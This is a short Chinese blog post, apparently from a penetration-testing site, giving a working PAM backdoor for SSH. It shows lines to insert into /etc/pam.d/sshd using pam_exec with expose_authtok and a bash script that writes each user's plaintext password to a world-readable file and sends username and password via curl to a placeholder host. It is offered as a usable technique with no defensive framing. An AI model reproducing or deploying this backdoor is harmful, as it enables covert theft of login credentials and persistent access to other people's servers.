PAM 后门记录用户名和密码

作者: print("") 分类: linux 发布时间: 2021-08-13 19:40

在/etc/pam.d/sshd 中添加如下的数据 

auth [default=ignore] pam_exec.so expose_authtok quiet /etc/security/suicide.sh
password [default=ignore] pam_exec.so expose_authtok quiet /etc/security/suicide.sh

脚本内容如下: 

#!/usr/bin/env bash
recordfile=/etc/pamlog.conf
if [ ! -f $recordfile ];then
    touch $recordfile
    chmod 644 $recordfile
fi

PAM_PASSWORD=`cat -`
echo "Service: ${PAM_SERVICE}; User: ${PAM_USER}; Password: ${PAM_PASSWORD}; Type: ${PAM_TYPE}" >> $recordfile

##发送数据到云端

curl xxxx.com/get_usermain=${PAM_USER}&password=${PAM_PASSWORD}

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA